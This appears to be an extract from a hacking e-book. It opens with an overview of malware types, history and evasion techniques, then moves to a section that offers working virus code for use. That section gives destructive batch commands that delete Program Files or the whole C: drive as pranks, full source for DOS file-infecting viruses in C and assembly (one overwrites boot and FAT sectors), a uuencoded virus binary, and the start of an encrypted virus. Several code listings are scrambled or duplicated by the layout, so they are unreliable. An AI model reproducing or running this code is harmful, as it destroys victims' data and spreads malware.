the attacker can connect to your computer. Software Detection Killers These trojans kill popular antivirus/firewall programs that protect your machine to give the attacker access to the victims machine. A trojan could have any one or a combination of the above mentioned functionalities. Worms Computer Worms are programs that reproduce and run independently, and travel across network connections. The main difference between viruses and worms is the method in which they reproduce and spread. A virus is dependent upon a host file or boot sector, and the transfer of files between machines to spread, while a worm can run completely independently and spread of its own accord through network connections. The security threat of worms is equivalent to that of a virus. Worms are capable of doing a whole range of damage such as destroying essential files in your system, slowing it 105

down to a great extent, or even causing some essential programs to crash. Two famous examples of worms are the MS-Blaster and Sesser worms.

Spyware
Spyware is the new-age term for advertising-supported software (Adware). Advertising in shareware products is a way for shareware authors to make money, other than by selling it to the user. There are several large media companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. If the user finds the banners annoying, there is usually an option to get rid of them by paying the licensing fee. Unfortunately, the advertising companies often also install additional tracking software on your system, which is continuously using your Internet connection to send statistical data back to the advertisers. While the privacy policies of the companies claim there will be no sensitive or identifying data collected from your system and that you shall remain anonymous, the fact remains that you have a server sitting on your PC that is sending information about you and your surfing habits to a remote location, using your bandwidth. Spyware has been known to slow down computers with their semi-intensive usage of processing power, bringing up annoying pop-up windows at the most inappropriate times and changing your Internet browsing settings such as your home page or default search engine to their own services. Even if many do not consider this illegal, it is still is a major security threat, and the fact that theres no way to get rid of them makes them as much of a nuisance as viruses. Logic Bombs A logic bomb is a program which has deliberately been written or modified to produce results when certain conditions are met that are unexpected and unauthorized by legitimate users or owners of the software. Logic bombs may reside within standalone programs, or they may be part of worms or viruses. A variation of the logic bomb is the time bomb that explodes at a certain time. An example of a time bomb is the infamous Friday the 13th virus.

Classification
Viruses can be subdivided into a number of types, the main ones being: Boot sector viruses Companion viruses Email viruses Logic bombs and time bombs 106

Macro viruses Cross-site scripting virus

Two other types of malware are often classified as viruses, but are actually forms of distributing malware: Trojan horses Worms

Boot sector virus A boot sector virus alters or hides in the boot sector, usually the 1st sector, of a bootable disk or hard drive. Boot sector viruses were prevalent in the 1980s.

Companion virus
A companion virus does not have host files per se, but exploits MS-DOS. A companion virus creates new files (typically .COM but can also use other extensions such as ".EXD") that have the same file names as legitimate .EXE files. When a user types in the name of a desired program, if a user does not type in ".EXE" but instead does not specify a file extension, DOS will assume he meant the file with the extension that comes first in alphabetical order and run the virus. For instance, if a user had "(filename).COM" (the virus) and "(filename).EXE" and the user typed "filename", he will run "(filename).COM" and run the virus. The virus will spread and do other tasks before redirecting to the legitimate file, which operates normally. Some companion viruses are known to run under Windows 95 and on DOS emulators on Windows NT systems. Path companion viruses create files that have the same name as the legitimate file and place new virus copies earlier in the directory paths. These viruses have become increasingly rare with the introduction of Windows XP,which does not use the MS-DOS command prompt.

E-mail virus
An E-mail virus is a virus which uses e-mail messages as a mode of transport. These viruses often copy themselves by automatically mailing copies to hundreds of people in the victim's address book.

107

Logic bomb
A logic bomb employs code that lies inert until specific conditions are met. The resolution of the conditions will trigger a certain function (such as printing a message to the user and/or deleting files). An example of a logic bomb would be a virus that waits to execute until it has infected a certain number of hosts. A time bomb is a subset of logic bomb, which is set to trigger on a particular date and/or time.

Macro virus
A macro virus, often written in the scripting languages for Microsoft programs such as Word and Excel, is spread in Microsoft Office by infecting documents and spreadsheets.

Cross-site scripting virus


A cross-site scripting virus (XSSV) is a type of virus that utilizes cross-site scripting vulnerabilities to replicate. A XSSV is spread between vulnerable web applications and web browsers creating a symbiotic relationship.

Trojan horse
Trojan Horses are impostor files that claim to be something desirable but, in fact, are malicious. Rather than insert code into existing files, a Trojan horse appears to do one thing (install a screen saver, or show a picture inside an e-mail for example) when in fact it does something entirely different, and potentially malicious, such as erase files. Trojans can also open back doors so that computer hackers can gain access to passwords, and other personal information stored on a computer. Although often referred to as such, Trojan horses are not viruses in the strict sense because they cannot replicate automatically. For a Trojan horse to spread, it must be invited onto a computer by the user opening an email attachment or downloading and running a file from the Internet, for example.

Worm
A worm is a piece of software that uses computer networks and security flaws to create copies of itself. A copy of the worm will scan the network for any other machine that has a specific security flaw. It replicates itself to the new machine using the security flaw, and then begins scanning and replicating a new.

108

Worms are programs that replicate themselves from system to system without the use of a host file. This is in contrast to viruses, which requires the spreading of an infected host file. Although worms generally exist inside of other files, often Word or Excel documents, there is a difference between how worms and viruses use the host file. Usually the worm will release a document that already has the "worm" macro inside the document. The entire document will travel from computer to computer, so the entire document should be considered the worm. Mudroom or ILOVEYOU are two examples of worms.

Effects of computer viruses


Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and make their presence known by presenting text, video, or audio messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss.

Use of the word "virus"


The word virus is derived from and used in the same sense as the biological equivalent. The term "virus" is often used in common parlance to describe all kinds of malware (malicious software), including those that are more properly classified as worms or Trojans. Most popular anti-virus software packages defend against all of these types of attack. In some technical communities, the term "virus" is also extended to include the authors of malware, in an insulting sense. The English plural of "virus" is "viruses". Some people use "virii" or "viri" as a plural, but this is rare. For a discussion about whether "viri" and "virii" are correct alternatives of "viruses", see plural of virus. The term "VIRUS" was first used in an academic publication by Fred Cohen in his 1984 paper Experiments with Computer Viruses, where he credits Len Adleman with coining it. However, a 1972 science fiction novel by David Gerrold, When H.A.R.L.I.E. Was One, includes a description of a fictional computer program called "VIRUS" that worked just like a virus (and was countered by a program called "VACCINE"). The term "computer virus" with current usage also appears in the comic book Uncanny X-Men #158, written by Chris Claremont and published in 1982. Therefore, although Cohen's use of "virus" may, perhaps, have been the first "academic" use, the term had been used earlier.

Back
109

110

111

History
A program called "Elk Cloner" is credited with being the first computer virus to appear "in the wild" -- that is, outside the single computer or lab where it was created. Written in 1982 by Rich Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk. This virus was originally a joke, created by the high school student and put onto a game. The game was set to play, but release the virus on the 50th time of starting the game. Only this time, instead of playing the game, it would change to a blank screen that read a poem about the virus named Elk Cloner. The computer would then be infected. The first PC virus was a boot sector virus called (c)Brain, created in 1986 by two brothers, Basit and Amjad Farooq Alvi, operating out of Lahore, Pakistan. The brothers reportedly created the virus to deter pirated copies of software they had written. However, analysts have claimed that the Ashar virus, a variant of Brain, possibly predated it based on code within the virus. Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS and modem use, and software sharing. Bulletin board driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBS's. Within the "pirate scene" of hobbyists trading illicit copies of commercial software, traders in a hurry to obtain the latest applications and games were easy targets for viruses. Since the mid-1990s, macro viruses have become common. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel. These viruses spread in Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most of these viruses were able to spread on Macintosh computers as well. Most of these viruses did not have the ability to send infected e-mail. Those viruses which did spread through e-mail took advantage of the Microsoft Outlook COM interface. 112

Macro viruses pose unique problems for detection software. For example, some versions of Microsoft Word allowed macros to replicate themselves with additional blank lines. The virus behaved identically but would be misidentified as a new virus. In another example, if two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus unique from the "parents". A computer virus may also be transmitted through instant messaging. A virus may send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) and follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. The newest species of the virus family is the cross-site scripting virus. The virus emerged from research and was academically demonstrated in 2005. This virus utilizes crosssite scripting vulnerabilities to propagate. Since 2005 there have been multiple instances of the cross-site scripting viruses in the wild, most notable sites affected have been MySpace and Yahoo.

Back

113

114

Why do people write and spread viruses?


It is difficult to know why people write them. Everyone has their own reasons. Some general reasons are to experiment how to write viruses or to test their programming talent. Some people just like to see how the virus spreads and gets famous around the World. The following is a list from news group postings alt.comp.virus and tries to explain why people write and spread viruses. They don't understand or prefer not to think about the consequences for other people They simply don't care They don't consider it to be their problem if someone else is inconvenienced They draw a false distinction between creating/publishing viruses and distributing them They consider it to be the responsibility of someone else to protect systems from their creations They get a buzz, acknowledged or otherwise, from vandalism They consider they're fighting authority They like 'matching wits' with anti virus vendors It's a way of getting attention, getting recognition from their peers and their names (or at least that of their virus) in the papers and the Wild List They're keeping the anti virus vendors in a job Replication strategies In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user tries to start an infected program, the virus' code may be executed first. Viruses can be divided into two types, on the basis of their behavior when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect these targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or the operating system itself. 115

Nonresident viruses
Nonresident viruses can be thought of as consisting of a finder module and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that file. For simple viruses the replicator's tasks are to: 1. 2. 3. 4. 5. 6. 7. 8. 9. Open the new file Check if the executable file has already been infected (if it is, return to the finder module) Append the virus code to the executable file Save the executable's starting point Change the executable's starting point so that it points to the start location of the newly copied virus code Save the old start location to the virus in a way so that the virus branches to that location right after its execution. Save the changes to the executable file Close the infected file Return to the finder so that it can find new files for the replicator to infect. Resident viruses Resident viruses contain a replication module that is similar to the one that is employed by nonresident viruses. However, this module is not called by a finder module. Instead, the virus loads the replication module into memory when it is executed and ensures that this module is executed each time the operating system is called to perform a certain operation. For example, the replication module can be called each time the operating system executes a file. In this case, the virus infects every suitable program that is executed on the computer. Resident viruses are sometimes subdivided into a category of fast infectors and a category of slow infectors. Fast infectors are designed to infect as many files as possible. For instance, a fast infector can infect every potential host file that is accessed. This poses a special problem to anti-virus software, since a virus scanner will access every potential host file on a computer when it performs a system-wide scan. If the virus scanner fails to notice that such a virus is present in memory, the virus can "piggy-back" on the virus scanner and in this way infect all files that are scanned. Fast infectors rely on their fast infection rate to 116

spread. The disadvantage of this method is that infecting many files may make detection more likely, because the virus may slow down a computer or perform many suspicious actions that can be noticed by anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. For instance, some slow infectors only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down a computer noticeably, and will at most infrequently trigger anti-virus software that detects suspicious behavior by programs. The slow infector approach does not seem very successful however.

Host types
Viruses have targeted various types of hosts. This is a non-exhaustive list: Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux) Volume Boot Records of floppy disks and hard disk partitions The master boot record (MBR) of a hard disk General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell script files on Unix-like platforms). Application-specific script files (such as Telix-scripts) Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)

Methods to avoid detection


In order to avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool anti-virus software, however. Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example the CIH virus, or Chernobyl Virus, infects Portable Executable files. Because those files had many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file. Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them. 117

As computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced.

Avoiding bait files and other undesirable hosts


A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integrity check of their own code. Infecting such programs will therefore increase the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software. Another type of hosts that viruses sometimes avoid is bait files. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus: Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file, than to exchange a large application program that has been infected by the virus. Anti-virus professionals can use bait files to study the behavior of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus. Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the user that a virus is probably active on the system. Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage instructions'. A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.

Stealth
118

Some viruses try to trick anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus softwares request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it seems that the file is "clean". Modern anti-virus software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to avoid stealth is to boot from a medium that is known to be clean.

Self-modification
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.

Simple self-modifications
In the past, some viruses modified themselves only in simple ways. For example, they regularly exchanged subroutines in their code for others that would perform the same action for example, 2+2 could be swapped for 1+3. This poses no problems to a somewhat advanced virus scanner. Encryption with a variable key A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Mostly, the decryption techniques that these viruses employ are simple and mostly done by just XORing each byte with a randomized key that was saved by the parent virus. The use of XOR-operations has the additional advantage that the encryption and decryption routine are the same (a XOR b = c, c XOR b = a.) 119

Polymorphic code
Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts that stay the same on each infection, making it impossible to detect directly using signatures. Anti-virus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body. See Polymorphic code for technical detail on how such engines operate. Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for anti-virus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.

Metamorphic code
To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly language code, 90% of it part of the metamorphic engine.

Conclusions
There are lots of viruses in the world and new viruses are coming up every day. There are new anti-virus programs and techniques developed too. It is good to be aware of viruses

120

and other malware and it is cheaper to protect you environment from them rather then being sorry. There might be a virus in your computer if it starts acting differently. There is no reason to panic if the computer virus is found. It is good to be a little suspicious of malware when you surf in the Internet and download files. Some files that look interesting might hide a malware. A computer virus is a program that reproduces itself and its mission is to spread out. Most viruses are harmless and some viruses might cause random damage to data files. A trojan horse is not a virus because it doesn't reproduce. The trojan horses are usually masked so that they look interesting. There are trojan horses that steal passwords and formats hard disks. Marco viruses spread from applications which use macros. Macro viruses spreads fast because people share so much data, email documents and use the Internet to get documents. Macros are also very easy to write. Some people want to experiment how to write viruses and test their programming talent. At the same time they do not understand about the consequences for other people or they simply do not care. Viruses mission is to hop from program to other and this can happen via floppy disks, Internet FTP sites, newsgroups and via email attachments. Viruses are mostly written for PCcomputers and DOS environments. Viruses are not any more something that just programmers and computer specialist have to deal with. Today everyday users have to deal with viruses.

Back

121

Viruses Programmer
1) A simple virus programed..a @ECHO OFF IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.* ===================end================== and paste it in notepad and give it the name what u want eg <fun.bat>u have to give the bat ext. other wise it wont work. simple virus just 1 sentecne just for fun. =================cut below=============

2) Formate your friends PC =================cut below============= @ ECHO OFF DEL C:\ *.*/Y. 3) R-virus #include

#include #include #include #include

/* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM file which CVIRUS can infect without increasing the size of the 122

file. (Since this would tip off the victim to CVIRUS's presence, no file under this size will be infected.) It should be set to the approximate size of the LZEXEd .EXE file produced from this code, but always a few bytes larger. Why? Because this way CVIRUS doesn't need to check itself for previous infection, saving time. SIGNATURE is the four-byte signature that CVIRUS checks for to prevent re-infection of itself. */ #ifdef DEBUG #define TOO_SMALL 6000 #else #define TOO_SMALL 4735 #endif #define SIGNATURE "NMAN" /* The following is a table of random byte values. Be sure to constantly change this to prevent detection by virus scanners, but keep it short (or non-exsistant) to keep the code size down. */ char screw_virex[] = "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04"; void hostile_activity(void) { /* Put whatever you feel like doing here... I chose to make this routine trash the victim's boot, FAT, and directory sectors, but you can alter this code however you want, and are encouraged to do so. */

123

#ifdef DEBUG puts("\aAll files infected!"); exit(1); #else /* Overwrite five sectors, starting with sector 0, on C:, with the memory at location DS:0000 (random garbage). */ abswrite(2,5,0,(void *) 0); __emit__(0xCD, 0x19); // Reboot computer #endif } int infected(char *fname) { /* This function determines if fname is infected. It reads four bytes 28 bytes in from the start and checks them agains the current header. 1 is returned if the file is already infected, 0 if it isn't. */ register int handle; char virus_signature[35]; static char check[] = SIGNATURE; handle = _open(fname, O_RDONLY); _read(handle, virus_signature, sizeof(virus_signature)); close(handle); #ifdef DEBUG 124

printf("Signature for %s: %.4s\n", fname, &virus_signature[28]); #endif /* This next bit may look really stupid, but it actually saves about 100 bytes. */ return((virus_signature[30] == check[2]) && (virus_signature[31] == check[3])); } void spread(char *virus, struct ffblk *victim) { /* This function infects victim with virus. First, the victim's attributes are set to 0. Then the virus is copied into the victim's file name. Its attributes, file date/time, and size are set to that of the victim's, preventing detection, and the files are closed. */ register int virus_handle, victim_handle; unsigned virus_size; char virus_code[TOO_SMALL + 1], *victim_name; /* This is used enought to warrant saving it in a separate variable */ victim_name = victim->ff_name;

#ifdef DEBUG printf("Infecting %s with %s...\n", victim_name, virus); #endif /* Turn off all of the victim's attributes so it can be replaced */ _chmod(victim_name, 1, 0); 125

#ifdef DEBUG puts("Ok so far..."); #endif

/* Recreate the victim */ virus_handle = _open(virus, O_RDONLY); victim_handle = _creat(victim_name, victim->ff_attrib);

/* Copy virus */ virus_size = _read(virus_handle, virus_code, sizeof(virus_code)); _write(victim_handle, virus_code, virus_size); #ifdef DEBUG puts("Almost done..."); #endif /* Reset victim's file date, time, and size */ chsize(victim_handle, victim->ff_fsize); setftime(victim_handle, (struct ftime *) &victim->ff_ftime);

/* Close files */ close(virus_handle); close(victim_handle); #ifdef DEBUG 126

puts("Infection complete!"); #endif } struct ffblk *victim(void) { /* This function returns a pointer to the name of the virus's next victim. This routine is set up to try to infect .EXE and .COM files. If there is a command line argument, it will try to infect that file instead. If all files are infected, hostile activity is initiated... */ register char **ext; static char *types[] = {"*.EXE", "*.COM", NULL}; static struct ffblk ffblk; int done; for (ext = (*++_argv) ? _argv : types; *ext; ext++) { for (ext = (*++_argv) ? _argv : types; *ext; ext++) { done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH); while (!done) { #ifdef DEBUG printf("Scanning %s...\n", ffblk.ff_name); #endif /* If you want to check for specific days of the week, months, etc.... here is the place to insert the code (don't forget to "#include "). */ 127

if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name))) return(&ffblk); done = findnext(&ffblk); } } } /* If there are no files left to infect, have a little fun */ hostile_activity(); return(0); } int main(int argc, char *argv[]) { /* In the main program, a victim is found and infected. If all files are infected, a malicious action is performed. Otherwise, a bogus error message is displayed, and the virus terminates with code 1, simulating an error. */ char *err_msg[] = { "Out of memory", "Bad EXE format", "Invalid DOS version", "Bad memory block", "FCB creation error", "Sharing violation", "Abnormal program termination", "Divide error", }; char *virus_name; spread(argv[0], victim()); puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]); 128

return(1); }

4) R-300 viruse

; ; ; ; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector. ; When an infected program is started, the virus will infect all files in the ; current directory and use the time counter for its encryption. It displays ; the text "T-1000" when it is ready infecting. Code Segment para 'code' R-1000 Virus

Assume Cs:Code,Ds:Code Length Equ Offset EndByte-Offset Main Org 100h Main: Mov Si,Offset Decrypt Mov Di,Si Mov Cl,Offset EndByte-Offset Decrypt On2: Lodsb Db 34h Crypt Db 0 Stosb Dec Cl Cmp Cl,0ffh Jne On2 Decrypt: 129

Mov Ah,4eh Push Ax Encr: Mov Ah,2ch Int 21h Mov Crypt,Dl Mov Si,Offset Decrypt Mov Di,Offset EndByte+10 Mov Cx,Offset EndByte-Offset Decrypt On3: Lodsb Xor Al,Crypt Stosb Dec Cx Cmp Cx,0ffffh Jne On3 Pop Ax On1: Xor Cx,Cx Mov Dx,Offset Nam Int 21h Jc Einde Mov Ax,3d01h Mov Dx,9eh Int 21h Mov Bx,Ax Mov Ah,40h Push Ax Mov Cx,Offset Decrypt-Offset Main Mov Dx,Offset Main Int 21h 130

Pop Ax Mov Cx,Offset EndByte-Offset Decrypt Mov Dx,Offset EndByte+10 Int 21h Mov Ah,3eh Int 21h Mov Ah,4fh Push Ax Jmp Short Encr Einde: Mov Ah,9 Mov Dx,Offset Msg Push Cs Pop Ds Int 21h Int 20h Msg Nam Db 'T-1000$' Db '*.Com',0

EndByte Db 0 Code Ends

End Main

; ; > and Remember Don't Forget to Call < ; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < ; 131

begin 775 t-1000.com MOA(!B_ZQ::PT`*K^R8#Y_W7UM$Y0M"S-(8@6"0&^$@&_A0&Y:0"L,@8)`:I) M@_G_=?18,\FZ=0'-(7(GN`$]NIX`S2&+V+1`4+D2`+H``<TA6+EI`+J%`<TA BM#[-(;1/4.NRM`FZ;@$.'\TAS2!4+3$P,#`D*BY#;VT````` ` end

5) leprosy.c viruses

#pragma inline #define CRLF "\x17\x14" /* CR/LF combo encrypted. */ /* No match in wildcard search. */

#define NO_MATCH 0x12

/* The following strings are not garbled; they are all encrypted */ /* using the simple technique of adding the integer value 10 to */ /* each character. They are automatically decrypted by */ /* 'print_s()', the function which sends the strings to 'stdout' */ /* using DOS service 09H. All are terminated with a dollar-sign */ /* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF \x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; 132 "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|

struct _dta { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13];

/* Disk Transfer Area format for find. */

} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */

const char filler[] = "XX"; const int virus_size = 666; const int infection_rate = 4; char compare_buf[20]; int handle; int datestamp, timestamp; char diseased_count = 0; char success = 0;

/* Pad file length to 666 bytes. */ /* The size in bytes of the virus code. */ /* How many files to infect per run. */ /* Load program here to test infection. */

const char *codestart = (char *) 0x100; /* Memory where virus code begins. */

/* The current file handle being used. */ /* Store original date and time here. */ /* How many infected files found so far. */ /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI /* Standard C, for the support functions of this program. int find_first( char *fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); 133 */

*/

void open_handle( char *fn ); void print_s( char *s ); void restore_timestamp( void );

/*----------------------------------*/ /* MAIN PROGRAM */ /*----------------------------------*/ int main( void ) { int x = 0; do { if ( find_healthy() ) { infect(); x++; success++; } else { _DX = (int) ".."; _AH = 0x3b; asm int 21H; x++; } if ( success ) print_s( fake_msg ); else if ( diseased_count > 6 ) for( x = 0; x < 3; x++ ) print_s( virus_msg[x] ); else print_s( fake_msg ); return; 134 /* Otherwise, keep a low profile. */ /* If we found 6+ infected files */ /* along the way, laugh!! */ /* If there ain't a file here... */ /* See if we can step back to */ /* the parent directory, and try */ /* there. */ /* Increment the counter anyway, to */ /* avoid infinite loops. */ /* Do this until we've had enough. */ /* feed 'em the phony error line. */ /* If we got something this time, */ /* Is there an un-infected file? */ /* Well, then infect it! */ /* Add one to the counter. */ /* Carve a notch in our belt. */

} while( x < infection_rate );

void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; _AL = 0x01; _AH = 0x43; asm int 21H; _BX = handle; _CX = virus_size; _DX = (int) codestart; _AH = 0x40; asm int 21H; restore_timestamp(); close_handle(); return; } /* Keep original date & time. */ /* Close file. */ /* No attribute flags are set. */ /* Use Set Attribute sub-function. */ /* Assure access to write file. */ /* Call DOS interrupt. */ /* Re-open the healthy file. */ /* BX register holds handle. */ /* Number of bytes to write. */ /* Write program code. */ /* Set up and call DOS. */

open_handle( dta->filename );

int find_healthy( void ) { if ( find_first("*.EXE") != NO_MATCH ) if ( healthy() ) return 1; else while ( find_next() != NO_MATCH ) if ( healthy() ) return 1; if ( healthy() ) return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ 135 /* If you find one, great! */ /* Find COM? */ /* If it's healthy, OK! */ if ( find_first("*.COM") != NO_MATCH ) /* Try a few more otherwise. */ /* Find EXE? */ /* If it's healthy, OK! */

if ( healthy() ) return 1; return 0; } /* If you find one, great! */ /* Otherwise, say so. */

int healthy( void ) { int i; datestamp = dta->datestamp; timestamp = dta->timestamp; open_handle( dta->filename ); _BX = handle; _CX = 20; _DX = (int) compare_buf; _AH = 0x3f; asm int 21H; restore_timestamp(); close_handle(); for ( i = 0; i < 20; i++ ) return 1; diseased_count++; return 0; } /* Keep original date & time. */ /* Close the file. */ /* Compare to virus code. */ /* If no match, return healthy. */ /* Chalk up one more fucked file. */ /* Otherwise, return infected. */ /* Open last file located. */ /* BX holds current file handle. */ /* We only want a few bytes. */ /* DX points to the scratch buffer. */ /* Read in file for comparison. */ /* Save time & date for later. */

if ( compare_buf[i] != *(codestart+i) )

void restore_timestamp( void ) { _AL = 0x01; _BX = handle; _CX = timestamp; _DX = datestamp; _AH = 0x57; asm int 21H; 136 /* Do DOS service. */ /* Keep original date & time. */ /* Same file handle. */ /* Get time & date from DTA. */

return; }

void print_s( char *s ) { char *p = s; while ( *p ) { *p -= 10; p++; } _DX = (int) s; _AH = 0x09; asm int 21H; return; } /* Set DX to point to adjusted string. */ /* Set DOS function number. */ /* Call DOS interrupt. */ /* Subtract 10 from every character. */

int find_first( char *fn ) { _DX = (int) fn; _CX = 0xff; _AH = 0x4e; asm int 21H; return _AX; } /* Point DX to the file name. */ /* Search for all attributes. */ /* 'Find first' DOS service. */ /* Go, DOS, go. */ /* Return possible error code. */

int find_next( void ) { _AH = 0x4f; asm int 21H; return _AX; } /* 'Find next' function. */ /* Call DOS. */ /* Return any error code. */

void open_handle( char *fn ) { 137

_DX = (int) fn; _AL = 0x02; _AH = 0x3d; asm int 21H; handle = _AX; return; }

/* Point DX to the filename. */ /* Always open for both read & write. */ /* "Open handle" service. */ /* Call DOS. */ /* Assume handle returned OK. */

void close_handle( void ) { _BX = handle; _AH = 0x3e; asm int 21H; return; } 6) viruse200063 model tiny .code org 100h ; x*x*x*x*x*x*x ; Virus code segment ; COM file starting IP ; jmp decrypt ; handles encryption and decryption /* Load BX register w/current file handle. */ /* Set up and call DOS service. */

entry_point: db 0e9h,0,0 decrypt: patch_startencrypt:

mov cx,(offset heap - offset startencrypt)/2 ; iterations mov di,offset startencrypt ; start of decryption decrypt_loop: db 81h,35h decrypt_value dw 0 inc di inc di loop decrypt_loop startencrypt: 138 ; decrypt mo' ; xor word ptr [di], xxxx ; initialised at zero for null effect ; calculate new decryption location

call next next: pop bp sub bp,offset next lea si,[bp+save3] mov di,100h push di movsw movsb

; calculate delta offset ; bp = IP next ; bp = delta offset

; For later return

